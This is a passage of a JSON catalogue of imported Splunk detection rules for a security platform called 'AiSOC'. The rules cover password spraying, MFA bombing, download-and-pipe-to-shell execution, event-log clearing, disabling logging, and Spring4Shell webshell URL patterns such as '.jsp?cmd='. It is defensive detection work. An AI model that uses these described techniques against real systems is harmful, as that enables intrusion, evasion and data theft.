"severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remcos-rat-file-creation-in-remcos-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25ae862a-1ac3-11ec-94a1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remcos_rat_file_creation_in_remcos_folder.yml" } }, { "id": "splunk-security-content-25bdb6cb-2e49-4d34-a93c-d6c567c122fe", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Authenticate From Process", "description": "The following analytic identifies a source process failing to authenticate multiple users, potentially indicating a Password Spraying attack. It leverages Windows Event 4625, which logs failed logon attempts, and uses statistical analysis to detect anomalies. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. If confirmed malicious, the attacker could compromise multiple accounts, leading to unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-authenticate-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25bdb6cb-2e49-4d34-a93c-d6c567c122fe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_authenticate_from_process.yml" } }, { "id": "splunk-security-content-25ca9594-7a0d-4a95-a5e5-3228d7398ec8", "type": "detection", "name": "Kubernetes Process with Anomalous Resource Utilisation", "description": "The following analytic identifies high resource utilization anomalies in Kubernetes processes. It leverages process metrics from an OTEL collector and hostmetrics receiver, fetched via the Splunk Infrastructure Monitoring Add-on. The detection uses a lookup table with average and standard deviation values to spot anomalies. This activity is significant as high resource utilization can indicate security threats like cryptojacking, unauthorized data exfiltration, or compromised containers. If confirmed malicious, such anomalies can disrupt services, exhaust resources, increase costs, and allow attackers to evade detection or maintain access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-with-anomalous-resource-utilisation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25ca9594-7a0d-4a95-a5e5-3228d7398ec8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_with_anomalous_resource_utilisation.yml" } }, { "id": "splunk-security-content-2628b087-4189-403f-9044-87403f777a1b", "type": "detection", "name": "Azure AD New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for an Azure AD account. It leverages Azure AD AuditLogs to identify when a user registers new security information. This activity is significant because adversaries who gain unauthorized access to an account may add their own MFA method to maintain persistence. If confirmed malicious, this could allow attackers to bypass existing security controls, maintain long-term access, and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2628b087-4189-403f-9044-87403f777a1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-264ea131-ab1f-41b8-90e0-33ad1a1888ea", "type": "detection", "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within an Azure AD tenant. It leverages Azure AD Sign-in Logs, specifically error code 500121, to detect more than 10 failed MFA attempts within 10 minutes. This behavior is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication prompts. If confirmed malicious, this activity could lead to unauthorized access, allowing attackers to compromise user accounts and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "264ea131-ab1f-41b8-90e0-33ad1a1888ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-26f02e96-c300-11eb-b611-acde48001122", "type": "detection", "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic detects the execution of the `Invoke-AzureHound` command-line argument, commonly used by the AzureHound tool. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because AzureHound is often used for reconnaissance in Azure environments, potentially exposing sensitive information. If confirmed malicious, this activity could allow an attacker to map out Azure Active Directory structures, aiding in further attacks and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-azurehound-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "26f02e96-c300-11eb-b611-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_azurehound_command_line_arguments.yml" } }, { "id": "splunk-security-content-26f86252-1549-45e1-a212-eb26840e86bc", "type": "detection", "name": "File Download or Read to Pipe Execution", "description": "The following analytic detects the use of download or file reading utilities from Windows, Linux or MacOS to download or read the contents of a file from a remote or local source and pipe it directly to a shell for execution.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions.\nThis activity is significant as it is commonly associated with malicious actions like coinminers and exploits such as CVE-2021-44228 in Log4j.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/file-download-or-read-to-pipe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "26f86252-1549-45e1-a212-eb26840e86bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/file_download_or_read_to_pipe_execution.yml" } }, { "id": "splunk-security-content-27187e0e-c221-471d-a7bd-04f698985ff6", "type": "detection", "name": "Windows Snake Malware File Modification Crmlog", "description": "The following analytic identifies the creation of a .crmlog file within the %windows%\\Registration directory, typically with a format of ..crmlog. This detection leverages the Endpoint.Filesystem datamodel to monitor file creation events in the specified directory. This activity is significant as it is associated with the Snake malware, which uses this file for its operations. If confirmed malicious, this could indicate the presence of Snake malware, leading to potential data exfiltration, system compromise, and further malicious activities. Immediate investigation is required to mitigate the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-file-modification-crmlog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27187e0e-c221-471d-a7bd-04f698985ff6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_file_modification_crmlog.yml" } }, { "id": "splunk-security-content-272b8407-842d-4b3d-bead-a704584003d3", "type": "detection", "name": "Remote Desktop Network Traffic", "description": "The following analytic detects unusual Remote Desktop Protocol (RDP) traffic on TCP/3389 by filtering out known RDP sources and destinations, focusing on atypical connections within the network. This detection leverages network traffic data to identify potentially unauthorized RDP access. Monitoring this activity is crucial for a SOC as unauthorized RDP access can indicate an attacker's attempt to control networked systems, leading to data theft, ransomware deployment, or further network compromise. If confirmed malicious, this activity could result in significant data breaches or complete system and network control loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-desktop-network-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "272b8407-842d-4b3d-bead-a704584003d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/remote_desktop_network_traffic.yml" } }, { "id": "splunk-security-content-272df6de-61f1-4784-877c-1fbc3e2d0838", "type": "detection", "name": "Remote WMI Command Attempt", "description": "The following analytic detects the execution of `wmic.exe` with the `node` switch, indicating an attempt to spawn a local or remote process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant as it may indicate lateral movement or remote code execution attempts by an attacker. If confirmed malicious, the attacker could gain remote control over the targeted system, execute arbitrary commands, and potentially escalate privileges or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-wmi-command-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "272df6de-61f1-4784-877c-1fbc3e2d0838", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_wmi_command_attempt.yml" } }, { "id": "splunk-security-content-27914692-9c62-44ea-9129-ceb429b61bd0", "type": "detection", "name": "Windows Audit Policy Auditing Option Modified - Registry", "description": "The following analytic detects potentially suspicious modifications to the Audit Policy auditing options registry values. It leverages data from the Endpoint.Registry data model, focusing on changes to one of the following auditing option values \"CrashOnAuditFail\", \"FullPrivilegeAuditing\", \"AuditBaseObjects\" and \"AuditBaseDirectories\" within the \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\\" registry key. This activity is significant as it could be a sign of a threat actor trying to tamper with the audit policy configuration, and disabling SACLs configuration. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-auditing-option-modified-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27914692-9c62-44ea-9129-ceb429b61bd0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_auditing_option_modified___registry.yml" } }, { "id": "splunk-security-content-27958de0-2857-43ca-9d4c-b255cf59dcab", "type": "detection", "name": "Windows PowerShell Disable HTTP Logging", "description": "The following analytic detects the use of `get-WebConfigurationProperty` and `Set-ItemProperty` commands in PowerShell to disable HTTP logging on Windows systems. This detection leverages PowerShell Script Block Logging, specifically looking for script blocks that reference HTTP logging properties and attempt to set them to \"false\" or \"dontLog\". Disabling HTTP logging is significant as it can be used by adversaries to cover their tracks and delete logs, hindering forensic investigations. If confirmed malicious, this activity could allow attackers to evade detection and persist in the environment undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004", "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-disable-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27958de0-2857-43ca-9d4c-b255cf59dcab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_disable_http_logging.yml" } }, { "id": "splunk-security-content-27ab61c5-f08a-438a-b4d3-325e666490b3", "type": "detection", "name": "O365 Mailbox Read Access Granted to Application", "description": "The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. This activity is significant because the Mail.Read permission allows applications to access and read all emails within a user's mailbox, which often contain sensitive or confidential information. If confirmed malicious, this could lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003", "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-read-access-granted-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27ab61c5-f08a-438a-b4d3-325e666490b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_read_access_granted_to_application.yml" } }, { "id": "splunk-security-content-27c3a83d-cada-47c6-9042-67baf19d2574", "type": "detection", "name": "Detect PsExec With accepteula Flag", "description": "The following analytic identifies the execution of `PsExec.exe` with the `accepteula` flag in the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because PsExec is commonly used by threat actors to execute code on remote systems, and the `accepteula` flag indicates first-time usage, which could signify initial compromise. If confirmed malicious, this activity could allow attackers to gain remote code execution capabilities, potentially leading to further system compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-psexec-with-accepteula-flag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27c3a83d-cada-47c6-9042-67baf19d2574", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_psexec_with_accepteula_flag.yml" } }, { "id": "splunk-security-content-27e600aa-77f8-4614-bc80-2662a67e2f48", "type": "detection", "name": "Windows DnsAdmins New Member Added", "description": "The following analytic detects the addition of a new member to the DnsAdmins group in Active Directory by leveraging Event ID 4732. This detection uses security event logs to identify changes to this high-privilege group. Monitoring this activity is crucial because members of the DnsAdmins group can manage the DNS service, often running on Domain Controllers, and potentially execute malicious code with SYSTEM privileges. If confirmed malicious, this activity could allow an attacker to escalate privileges and gain control over critical domain services, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dnsadmins-new-member-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27e600aa-77f8-4614-bc80-2662a67e2f48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dnsadmins_new_member_added.yml" } }, { "id": "splunk-security-content-27ed3e79-6d86-44dd-b9ab-524451c97a7b", "type": "detection", "name": "Windows Modify Registry Disable Windows Security Center Notif", "description": "The following analytic detects modifications to the Windows registry aimed at disabling Windows Security Center notifications. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path \"*\\\\Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience*\" with a value of \"0x00000000\". This activity is significant as it can indicate an attempt by adversaries or malware, such as Azorult, to evade defenses by suppressing critical update notifications. If confirmed malicious, this could allow attackers to persist undetected, potentially leading to further exploitation and compromise of the host system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-windows-security-center-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27ed3e79-6d86-44dd-b9ab-524451c97a7b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml" } }, { "id": "splunk-security-content-28077620-c9f6-11eb-8785-acde48001122", "type": "detection", "name": "Recon AVProduct Through Pwh or WMI", "description": "The following analytic detects suspicious PowerShell script execution via EventCode 4104, specifically targeting checks for installed anti-virus products using WMI or PowerShell commands. This detection leverages PowerShell Script Block Logging to identify scripts containing keywords like \"SELECT,\" \"WMIC,\" \"AntiVirusProduct,\" or \"AntiSpywareProduct.\" This activity is significant as it is commonly used by malware and APT actors to map running security applications or services, potentially aiding in evasion techniques. If confirmed malicious, this could allow attackers to disable or bypass security measures, leading to further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recon-avproduct-through-pwh-or-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28077620-c9f6-11eb-8785-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recon_avproduct_through_pwh_or_wmi.yml" } }, { "id": "splunk-security-content-2820f032-19eb-497e-8642-25b04a880359", "type": "detection", "name": "LOLBAS With Network Traffic", "description": "The following analytic identifies the use of Living Off the Land Binaries and Scripts (LOLBAS) with network traffic. It leverages data from the Network Traffic data model to detect when native Windows binaries, often abused by adversaries, initiate network connections. This activity is significant as LOLBAS are frequently used to download malicious payloads, enabling lateral movement, command-and-control, or data exfiltration. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1567", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/lolbas-with-network-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2820f032-19eb-497e-8642-25b04a880359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/lolbas_with_network_traffic.yml" } }, { "id": "splunk-security-content-2827c0fd-e1be-4868-ae25-59d28e0f9d4f", "type": "detection", "name": "Suspicious wevtutil Usage", "description": "The following analytic detects the usage of wevtutil.exe with parameters for clearing event logs such as Application, Security, Setup, Trace, or System. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because clearing event logs can be an attempt to cover tracks after malicious actions, hindering forensic investigations. If confirmed malicious, this behavior could allow an attacker to erase evidence of their activities, making it difficult to trace their actions and understand the full scope of the compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-wevtutil-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2827c0fd-e1be-4868-ae25-59d28e0f9d4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_wevtutil_usage.yml" } }, { "id": "splunk-security-content-2846089a-ffe9-4881-a2a2-43f3be2b8cc7", "type": "detection", "name": "Windows Chrome Extension Allowed Registry Modification", "description": "The following analytic detects modifications to the Windows registry keys that control the Chrome Extension Install Allowlist. Unauthorized changes to these keys may indicate attempts to bypass Chrome extension restrictions or install unapproved extensions. This detection helps identify potential security policy violations or malicious activity targeting Chrome extension settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-extension-allowed-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2846089a-ffe9-4881-a2a2-43f3be2b8cc7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_extension_allowed_registry_modification.yml" } }, { "id": "splunk-security-content-2850c734-2d44-4431-8139-1a56f6f54c01", "type": "detection", "name": "Web JSP Request via URL", "description": "The following analytic identifies URL requests associated with CVE-2022-22965 (Spring4Shell) exploitation attempts, specifically targeting webshell access on a remote webserver. It detects HTTP GET requests with URLs containing \".jsp?cmd=\" or \"j&cmd=\" patterns. This activity is significant as it indicates potential webshell deployment, which can lead to unauthorized remote command execution. If confirmed malicious, attackers could gain control over the webserver, execute arbitrary commands, and potentially escalate privileges, leading to severe data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-jsp-request-via-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2850c734-2d44-4431-8139-1a56f6f54c01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_jsp_request_via_url.yml" } }, { "id": "splunk-security-content-289ad59f-8939-4331-b805-f2bd51d36fb8", "type": "detection", "name": "Zscaler Behavior Analysis Threat Blocked", "description": "The following analytic identifies threats blocked by the Zscaler proxy based on behavior analysis. It leverages web proxy logs to detect entries where actions are blocked and threat names and classes are specified. This detection is significant as it highlights potential malicious activities that were intercepted by Zscaler's behavior analysis, providing early indicators of threats. If confirmed malicious, these blocked threats could indicate attempted breaches or malware infections, helping security teams to understand and mitigate potential risks in their environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-behavior-analysis-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "289ad59f-8939-4331-b805-f2bd51d36fb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_behavior_analysis_threat_blocked.yml" } }, { "id": "splunk-security-content-289ed0a1-4c78-4a43-9321-44ea2e089c14", "type": "detection", "name": "O365 New Forwarding Mailflow Rule Created", "description": "The following analytic detects the creation of new mail flow rules in Office 365 that may redirect or copy emails to unauthorized or external addresses. It leverages Office 365 Management Activity logs, specifically querying for the \"New-TransportRule\" operation and parameters like \"BlindCopyTo\", \"CopyTo\", and \"RedirectMessageTo\". This activity is significant as it can indicate potential data exfiltration or unauthorized access to sensitive information. If confirmed malicious, attackers could intercept or redirect email communications, leading to data breaches or information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-forwarding-mailflow-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "289ed0a1-4c78-4a43-9321-44ea2e089c14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_forwarding_mailflow_rule_created.yml" } }, { "id": "splunk-security-content-28b80028-851d-4b8d-88a5-375ba115418a", "type": "detection", "name": "Windows Remote Management Execute Shell", "description": "The following analytic detects the execution of winrshost.exe initiating CMD or PowerShell processes as part of a potential payload execution. winrshost.exe is associated with Windows Remote Management (WinRM) and is typically used for remote execution. By monitoring for this behavior, the detection identifies instances where winrshost.exe is leveraged to run potentially malicious commands or payloads via CMD or PowerShell. This behavior may indicate exploitation of remote management tools for unauthorized access or lateral movement within a compromised environment, signaling a potential security incident.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-management-execute-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28b80028-851d-4b8d-88a5-375ba115418a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_management_execute_shell.yml" } }, { "id": "splunk-security-content-28e06670-43df-11ec-a569-acde48001122", "type": "detection", "name": "Windows InstallUtil URL in Command Line", "description": "The following analytic detects the use of Windows InstallUtil.exe with an HTTP or HTTPS URL in the command line. This is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing URLs. This activity is significant as it may indicate an attempt to download and execute malicious code, potentially bypassing application control mechanisms. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment. Analysts should review the parent process, network connections, file modifications, and 